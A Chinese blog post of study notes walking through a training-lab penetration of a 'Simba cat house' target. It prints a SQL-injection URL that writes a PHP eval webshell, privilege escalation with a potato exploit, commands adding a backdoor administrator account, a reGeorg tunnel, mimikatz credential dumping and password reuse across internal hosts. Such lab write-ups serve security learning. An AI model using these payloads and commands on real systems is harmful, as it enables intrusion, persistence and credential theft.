“辛巴猫舍”内网渗透、提权、撞库学习笔记

最新推荐文章于 2024-05-01 21:12:48 发布
最新推荐文章于 2024-05-01 21:12:48 发布
阅读量599 收藏 5
点赞数
分类专栏: 网络与安全 文章标签: 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25953411/article/details/134350636
版权

前言:

在拿到靶机时,我们最先需要做的是信息收集,包括不限于:C段扫描,端口探测,指纹识别,版本探测等。其次就是 漏洞挖掘、漏洞利用、提权、维持权限、日志清理、留下后门。
以上就是渗透的基本流程。

这里以“辛巴猫舍”为靶机,开展一次由外到内的渗透。

正文:

1、SQL注入

在URL中输入

http://gognj2dm.aqlab.cn/?id=1%20and%201=2

后报错了,并回显了路径。证明存在SQL注入漏洞,于是进一步进行测试。
在这里插入图片描述
我们通过可以通过into dumpfile指令将webshell写入服务器,在浏览器URL输入命令如下:

http://gognj2dm.aqlab.cn/?id=1 union select 1,'<?php eval($_REQUEST[8])?>' into dumpfile 'C:/phpStudy/WWW/r.php'

该语句的意思是:通过联合查询,在数据库中查询数据1<?php eval($_REQUEST[8]) ?>,并将结果导出到C:/phpStudy/WWW/中的r.php文件中

  • <?php eval($_REQUEST[8]) ?>是字符串,所以要加单引号
  • 绝对路径中用反斜杠
  • into dumpfile后面的路径也需要加上单引号,因为这是一个文件

2、路径访问

用蚁键访问路径

http://gognj2dm.aqlab.cn/r.php

在这里插入图片描述

3、用户提权

进入服务器之后,运行cmd,输入whoami,获得自己的用户为test
在这里插入图片描述
在这里插入图片描述
输入net user 查看用户情况
在这里插入图片描述
输入net localgroup administrators查看管理员用户组,发现没有test
在这里插入图片描述
输入systeminfo发现目标服务器的系统为Microsoft Windows Server 2008 R2 Standard ,内网的IP地址为:10.0.1.4
在这里插入图片描述
为了远程该IP,我们就需要提权,使得自己可以完全的控制目标服务器。
可以从补丁层面远程渗透,但这里不展开讲。
在这里插入图片描述

把烂土豆、猕猴桃程序通过蚁剑上传到目标服务器,烂土豆程序上传前先改名为re.exe,然后终端输入指令:re.exe -p “whoami”,获得系统权限。
在这里插入图片描述
在这里插入图片描述
为了远程靶机服务器,需要自己建立一个用户,然后看对方是否开启3389。

通过输入命令:

re.exe -p “net user xxx a1s2d3-+ /add”

创建用户xxx。
接着,赋予xxx系统用户权限:r

e.exe -p “net localgroup administrators xxx /add”

可以通过net user验证一下是否建立成功
在这里插入图片描述

通过系统命令查看是否开启3389端口:re.exe -p “net -ano”,发现确实开始3389

4、远程连接

通过mstsc远程桌面连接,发现是windows server 2003 R2的机器,和目标主机不一致。
原因是我们访问的网站:http://gognj2dm.aqlab.cn对应IP59.63.166.70的3389端口不是目标服务器的端口,59.63.166.70:3389映射了该2003R2的服务器的3389端口,那么我们如果要访问目标靶机的3389的话,可以使用内网的其他服务器来进行访问

5、隧道搭建

将reGeorg中的tunnel.php通过蚁剑传入目标服务器,改名为333.php
在这里插入图片描述
然后在URL中输入一下,看有没有回显
在这里插入图片描述
下面使用命令开启代理regeorg程序,此脚本为python2开发的脚本,使用需要安装python2运行,命令为:

python reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://gognj2dm.aqlab.cn/333.php
  • -p 设置10086监听端口
  • -l设置本地监听地址
  • -u 设置目标来源

这里我卡了好就,因为这个脚本需要python 2的第三方库,下了半天没下载好,最后在朋友的帮助下解决了。

接着在本地电脑安装proxifier汉化版,设置代理规则,设置为本地mstsc.exe程序产生的通信数据通过127.0.0.1:10086端口进行传输
在这里插入图片描述
在这里插入图片描述
打开本地mstsc远程桌面,连接的服务器改为上面我们获取到的内网地址10.0.1.4,输入我们设置的账号密码,进入目标服务器的远程桌面
在这里插入图片描述

5、提权及撞库

在目标服务器上,管理员权限运行猕猴桃程序。
请添加图片描述
输入log开启日志,输入privilege::debug进行提权,输入sekurlsa::logonpasswords抓取登录该主机的用户名及密码。发现管理员组用户名:administrator,密码:woshifengge11.
在这里插入图片描述
然后在本地cmd中,输入 arp-a 对内网IP信息进行收集
请添加图片描述
通过简单的内网ip收集得到10.0.1.1、10.0.1.3、10.0.1.5、10.0.1.6、10.0.1.8五个ip,由此依次尝试撞库。

最后终于在10.0.1.8IP成功登录。得到我们里面放的flag。

请添加图片描述

参考文献

  1. 记一次猫舍由外到内的渗透撞库操作提取-flag ↩︎

晓梦林
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
进销存软件免费版 辛巴商贸通助力版 v0.9.29.0
11-11
辛巴商贸通助力版是中小企业进销存、财务管理一体化软件。辛巴商贸通助力版特点:1.录入单据自动生成报表:资金流与商品帐相结合,录入单据,自动生成相应报表。2.库存数量一目
内网靶场
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-28 1293
内网渗透 我们首先先讲一下,如何去利用sql注入漏洞 先讲两个导出文件的函数 into dumpfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径 into outfile 'C:\\phpstudy\\WWW\\123.txt'//写文件的一个函数,后面接路径 但是一般都用不了这两个函数,他和loadfile()一起的,如果能用loadfile() ,那代表这两个函数也能用 原因是:mysql.ini的配置问题,要手动添加一个配置 select 1,2,
入门SQL手注教程
Askshhbs的博客
04-22 337
这期教学是给小白学习的,大佬看看就好。 我们先打开靶场:宠物猫 异国短毛猫 纯种猫 加菲猫 波斯猫 辛巴猫 纯种双色/梵文波斯、异国小猫 CFA注册猫 我们先进去发现是一个很简单的页端。 我们先判断是否有注入。 我们先在链接后面添加: and 1=1 来判断是否有注入。 发现返回正常。 我们再在链接末尾输入:and 1=2 这里我们发现与之前and 1=1时的界面不一样了这就说明有注入。 (这里解释一下and 1=1是什么意思 其实很简单就是你问一个服务器1是不是=1
-sql注入
tlucky的博客
04-16 2429
漏洞地址 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 漏洞类型 Sql注入 漏洞描述及危害 sql注入是一种将sql代码插入或添加到应用用户的输入参数中,再将这些参数传递给后台的sql服务器加以解析并执行。Sql注入会导致数据库信息泄露,网页被篡改,数据库被恶意操作,服务器被远程控制和被种植木马等多种危害。 漏洞详情 http://afsgr16-b1ferw.aqlab.cn/index.php?id=1 属于数字型注入 ①数据库名 ②表名 http://
SQL注入靶场:辛巴猫
Zeker62的博客
07-28 4968
查:有多少行 进去是这样的:直接点击 可以看到:我们的url发生了变化, id是啥,我们猜测,id是数据库的前面的序号,像这样. 我们输入不同的id,可以得到不同的数据库,那么页面也就不同. 测试:id=3,有网页,我们接着测试id=4 id=5 id=6 发现都没有内容 说明id=3 的时候,数据表内容已经"见底"了 于是我们就知道了这个数据表有四行,包括id=0的初始页面 查:有多少列 使用order by 语句. 我从 1~3查,发现3没有,2有. 那么就证明这个数据表就两个字段 读者可以
通过SQL手工注入拿到管理员密码--辛巴猫
ningmini的博客
05-20 1865
通过SQL手工注入拿到管理员密码–辛巴猫 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
SQL手工注入练习:辛巴猫 + Sqlmap秒杀
m0_64382069的博客
11-24 346
SQL手工注入练习:辛巴猫 + Sqlmap秒杀:登录靶场、判断是否存在SQL注入漏洞、判断数据库字段数、判断回显点、查询相关内容、查询表、查询字段名、查询字段内容、
注入(一)
tomyyyyy
06-28 266
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
安卓应用-金融理财-辛巴财务手机记账软件 v1.0.3.0 安卓版.zip
08-13
安卓应用-金融理财-辛巴财务手机记账软件 v1.0.3.0 安卓版.zip
辛巴商贸通最新版9.10.7(20150504更新)单机版网络版专业版远程版通用服务器端完美免狗补丁
06-06
辛巴商贸通最新版9.10.7(20150504更新)单机版网络版专业版远程版通用服务器端完美免狗补丁,辛巴全系列服务器端免狗都有
simba:辛巴
03-11
simba:辛巴
p win7辛巴影子系统.zip
11-06
p win7统 辛巴影子卫士使用业界领先的虚拟化技术构造出一个影子替身来接管真实的操作系统,他就是真实系统的一个克隆,具有真实系统完全一样的功能
限流的学习
最新发布
weixin_43675252的博客
05-01 194
限流算法:滑动窗口算法滑动日志算法漏桶算法令牌桶算法。
力扣数据库题库学习(4.28日)--1587. 银行账户概要 II
Jesse_Kyrie的博客
04-28 205
对于力扣题1587. 银行账户概要 II的解答,提供解题思路与解题方法,知识点为:1. GROUP BY 2. SUM 3. LEFT JOIN 4. HAVING
党务学习|基于SprinBoot+vue的大学生党务学习平台(源码+数据库+文档)
伟庭的博客
04-27 747
大学生党务学习平台管理系统按照操作主体分为管理员和用户。用户的功能等。该系统采用了Mysql数据库,Java语言,Spring Boot框架等技术进行编程实现。大学生党务学习平台管理系统可以提高大学生党务学习平台信息管理问题的解决效率,优化大学生党务学习平台信息处理流程,保证大学生党务学习平台信息数据的安全,它是一个非常可靠,非常安全的应用程序。大学生党务学习平台管理系统;入党申请,党课Mysql数据库;Java语言。
集成学习算法学习笔记
m0_46521579的博客
04-27 449
三个臭皮匠顶一个诸葛亮集成学习会考虑多个评估器的建模结果,汇总后得到一个综合的结果,以此来获取比单个模型更好的回归或分类表现。很多独立的机器学习算法:决策树、神经网络、支持向量机集成学习构建了一组基学习器,并将它们综合起来作为最终的模型。在很多集成学习模型中,对基学习器的要求很低。集成学习适用于机器学习的几乎所有领域:回归、分类、推荐和排序。相同的多个基学习器不会带来任何提升,不同的模型取长补短,每个基学习器都会犯不同的错误,综合起来犯错的可能性不大。
PySide6 GUI 学习笔记——使用资源文件
Humbunklung的专栏
04-27 584
在界面开发中,我们常常将一些图片、图标等资源统一存放到资源文件中供使用,从而让图形界面表达能力更好,更加丰富,譬如带图标的按钮、菜单、窗口等等。PySide6可以将多个图标、图片等资源文件编译到.py文件中,这样可以被我们的程序直接调用,使得资源的管理更加方便。
公考学习平台|基于SprinBoot+vue的公考学习平台(源码+数据库+文档)
weixin_66413741的博客
04-30 876
本共享汽车管理系统有管理员和用户。管理员功能有个人中心,用户管理,投放地区管理,汽车信息管理,汽车投放管理,汽车入库管理,使用订单管理,汽车归还管理。用户可以在注册登录,可以对汽车进行使用产生订单,还可以归还。因而具有一定的实用性。本站是一个B/S模式系统,采用Spring Boot框架,MYSQL数据库设计开发,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得共享汽车管理系统管理工作系统化、规范化。
JET毛选学习笔记:如何利用《矛盾论》从做实验到做科研vol. 1
qq_30452897的博客
04-27 897
JET毛选学习笔记:如何利用《矛盾论》从做实验到做科研vol. 1
c#json序列化跟反序列化
09-10
C#中的Json序列化和反序列化是将对象转换为Json字符串和将Json字符串转换为对象的过程。你可以使用Newtonsoft.Json库来进行Json的序列化和反序列化操作。以下是一个简单的示例: 首先,确保你已经安装了Newtonsoft.Json库。你可以在Visual Studio中通过NuGet包管理器安装它。 示例代码如下: ```csharp using Newtonsoft.Json; // 定义一个Person类 class Person { public string Name { get; set; } public int Age { get; set; } } // 序列化对象为Json字符串 Person person = new Person { Name = "John", Age = 30 }; string json = JsonConvert.SerializeObject(person); // 反序列化Json字符串为对象 Person deserializedPerson = JsonConvert.DeserializeObject<Person>(json); ``` 在上面的示例中,我们定义了一个Person类,并创建了一个Person对象。通过调用`JsonConvert.SerializeObject`方法,我们将该对象序列化为一个Json字符串。 然后,通过调用`JsonConvert.DeserializeObject<T>`方法,我们将Json字符串反序列化为一个Person对象。 请注意,为了使用Newtonsoft.Json库,你需要在代码文件中添加`using Newtonsoft.Json;`语句。 希望这个简单的示例可以帮助你理解C#中的Json序列化和反序列化操作。如果你有更多的问题,请随时提问!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晓梦林

都看到这里了,支持一下作者呗~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值